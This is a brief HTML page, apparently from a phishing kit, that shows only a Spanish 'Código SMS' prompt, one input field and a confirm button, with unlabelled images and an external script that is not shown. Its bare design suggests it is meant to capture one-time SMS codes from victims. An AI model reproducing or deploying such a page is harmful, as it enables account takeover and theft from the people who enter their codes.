<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/other.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
</head>
<body>
    <div class="upot">
        <div>
            <img  src="./img/upotop-2.png" alt="">
        </div>
        
    </div>
            <div class="uncc">
                <img src="./img/otimso.svg" alt="">
            </div>
    <div class="main">
        <p>Código SMS</p>
           <form method="post" id="pg3">
                    <input type="tel" id="sps1" required placeholder="" maxlength="10">
                   

                    <button>Confirmar</button>
           </form>
    </div>
    <script src="./js/stb.js"></script>
</body>
</html>